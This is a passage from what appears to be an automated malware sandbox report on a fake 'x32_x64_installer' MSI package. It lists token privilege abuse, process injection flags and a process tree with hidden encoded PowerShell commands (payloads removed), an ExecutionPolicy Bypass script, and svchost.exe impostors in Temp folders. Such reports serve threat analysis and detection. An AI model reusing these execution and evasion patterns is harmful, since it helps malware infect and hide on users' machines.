| Token: SeMachineAccountPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\x32_x64_installer.zip
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4140 --field-trial-handle=2692,i,8678872182442199182,12502579059484928042,262144 --variations-seed-version /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\x32_x64_installer\" -spe -an -ai#7zMap25084:92:7zEvent26371
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\x32_x64_installer\setup\" -spe -an -ai#7zMap24552:104:7zEvent9109
C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Desktop\x32_x64_installer\setup\setup.msi"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 7F445D1A15E1E8DFF56A52947A4EF254
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssEFC8.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiEFB5.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrEFB6.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrEFB7.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe
"C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe"
C:\Windows\SysWOW64\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -e [encoded command removed]
C:\Users\Admin\AppData\Local\Temp\hyayJVO3XOEo3m1\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\hyayJVO3XOEo3m1\svchost.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x2c4,0x2c8,0x2cc,0x2c0,0x35c,0x7ff8a4342e98,0x7ff8a4342ea4,0x7ff8a4342eb0
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2280 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2956 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=3088 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3428 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3372 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3892 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --extension-process --renderer-sub-type=extension --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=5012 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:2
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=5280 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=5372 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5568 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=4848 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4724 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=3340 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=4132 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5828 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --mojo-platform-channel-handle=5892 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --mojo-platform-channel-handle=6152 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6608 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6608 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6784 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=6792 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5236 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=3624 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6040 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --mojo-platform-channel-handle=6568 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x50c 0x534
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=4204 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /n "C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\locale\pureviolet.pot"
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\dirmngr.exe
"C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\dirmngr.exe"
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe
"C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe"
C:\Windows\SysWOW64\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe
"C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -e [encoded command removed]
C:\Windows\SysWOW64\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Local\Temp\gPbvjrqJdNjoBNl\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\gPbvjrqJdNjoBNl\svchost.exe"
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe
"C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe"
C:\Windows\SysWOW64\explorer.exe
explorer.exe
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4912 -ip 4912
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpgconf.exe
"C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpgconf.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 2080
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -e [encoded command removed]
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -e [encoded command removed]
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 364 -p 4912 -ip 4912
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 2056
C:\Windows\SysWOW64\explorer.exe
explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4912 -ip 4912
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 2092
C:\Users\Admin\AppData\Local\Temp\b4Tvo7dAqteQ0zL\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\b4Tvo7dAqteQ0zL\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\UhwuE7JmPUqUfRj\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\UhwuE7JmPUqUfRj\svchost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -e [encoded command removed]
C:\Users\Admin\AppData\Local\Temp\Ko0JPYBqUfWBZzu\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\Ko0JPYBqUfWBZzu\svchost.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3456 -ip 3456
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2496 -ip 2496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3456 -s 2056
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 2064
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3456 -ip 3456
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2496 -ip 2496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 2060
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\scdaemon.exe
"C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\scdaemon.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x2cc,0x2d0,0x2d4,0x2c8,0x2c4,0x7ff8a4342e98,0x7ff8a4342ea4,0x7ff8a4342eb0
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2332 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2376 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=2496 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3400 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3464 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --extension-process --renderer-sub-type=extension --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4048 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4996 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=5016 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4908 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
